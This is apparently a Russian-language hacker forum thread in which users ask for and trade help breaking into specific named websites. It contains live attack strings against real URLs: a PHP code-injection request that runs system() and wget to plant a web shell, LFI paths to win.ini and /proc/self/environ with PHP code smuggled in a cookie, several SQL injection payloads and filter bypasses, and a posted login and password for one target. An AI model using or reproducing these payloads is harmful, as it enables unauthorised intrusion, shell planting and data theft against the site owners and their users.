Вопросы по уязвимостям

[m0Hze]

http://ecoportal.su/images/111.php

Код:

http://ecoportal.su/marketing.php?parent=%24{%40system%28$_GET[c]%29}&c=wget+shell+-O+./images/111.php

[zenon3]

все разобрался! Всем спасибо за подсказку

[z0mbie]

Есть у кого идеи как залить шелл?
Имеется lfi
http://ser[antigoogle]vices.ug[antigoogle]rasu.ru/?d=3&nid=../../../../../../../../../../windows/win.ini%00&PageId=1
Login:EDU\Stud
Pass:Qwe123
phpinfo
http://servi[antigoogle]ces.ugr[antigoogle]asu.ru/develop/test.php

[cat1vo]

Помогите обойти фильтр на select, from...
webSPELL CMS Version: 4.2.1b

http://lol[antigoogle]panic.ru/index.php?site=movies&action=show&id=1 or 1 group by mid(version(),rand(0)|0,64) having avg(0)#

[Сергей Бардюр]

Здравствуйте товарищи, пару вопросов имеется по SQL уязвимостям, первый, имеем SQL в таком запросе:

Код:

INSERT into table(value1,value2,value3,value4) values('text1','SQL','text3','text4') бла бла бла

Извиняюсь, URL уязвимый не могу привести, но думаю для профессионалов в запросе и так всё понятно.
Никак не получается пропихнуть туда свой любимый SQL запрос:
'+or+(@:=1)||@+group+by+concat(@@version,@:=@-1)having+@||min(@:=0)+--+1
Как бы я не старался, он не проходит, и 'and (@:=1)||@+group+by+concat(@@version,@:=@-1)having+@||min(@:=0) and' всякие конструкции пробовал, для него никак.
Зато прокатывают запросы для updatexml и extractvalue, но увы эти две функции отключены в моем случае, ещё прокатывает запрос через трюк name_const, но через этот способ помоему нереально крутить SQL по нормальному, хоть и дублирую правильно запрос в оба места, всё равно выдаёт ошибку на несоответствие.
Никогда не получалось к сожалению через name_const раскручивать SQL, хотя если память не изменяет, то через name_const вроде бы был трюк, запихивающий запрос в одну переменную, и подставляя её в два значения, таким образом все запросы вроде бы работали, если у кого этот запрос рабочий есть через name_const, буду очень признателен.
То есть, если есть нормальная методика выполнения запросов через name_const по конструкции: select 1 from 2 where 3=4 limit 5, то соответственно вопрос по вставке конкретного SQL запроса в вышеописанный пример решён, а если через name_const нельзя по нормальному крутить, тогда нужно как то вставить удобный запрос вывода информации в приведенный выше кусок уязвимого SQL запроса.


И второй вопрос, зашёл в тупиковую позицию, раскручиваю SQL в REQUEST_URI, выполняю такой запрос:
select(user)from(table)where(group=0x61646D696E), а вот оператора limit то запихнуть сюда и не могу, конструкция /**/ не помогает... в таблице нету колонок с primary key, как вывести по одной записи из таблицы в данном случае я не могу придумать.
Так же буду сильно благодарен за помощь, если может какие операторы ещё есть альтернативные, что то по типу offset (но его конечно в mysql нету).

[cat1vo]

Сергей Бардюр,
1. Вот здесь v1d0q предложил рабочий способ, пробуйте!
2.

Цитата:

select(user)from(table)where(group=0x61646D696E)

having(id>1)and(id<3)

[Consistent]

Помогите обойти фильтр на селект в ColdFusion CMS.Уязвимость есть, версию выводит, но если вставить в запрос select то выдет пустую страницу. Без него нереально крутить. Надеюсь на вашу помощь.

[aspi]

что можно сделать с таким инклудом?

http://www.cateringpage.com/index.php?page=LFIRFI

фильтр+сконца спереди мешают

[m0Hze]

Цитата:

Сообщение от aspi

что можно сделать с таким инклудом?

http://www.cateringpage.com/index.php?page=LFIRFI

фильтр+сконца спереди мешают

=\
Post

Код:

page=../../../../../../../../../../proc/self/environ%00

Cookie: <?php PHPCODE; ?>
Фильтр на eval,phpinfo обходи своим умом

[devv]

https://www.h2owirelessnow.com/pageControl.php?page=planDetail&p_code=PLNH30'+ord er+by+4--
Немогу никак раскрутить, помогите кому не сложно, колонок 6 штук, вывода информации добиться не могу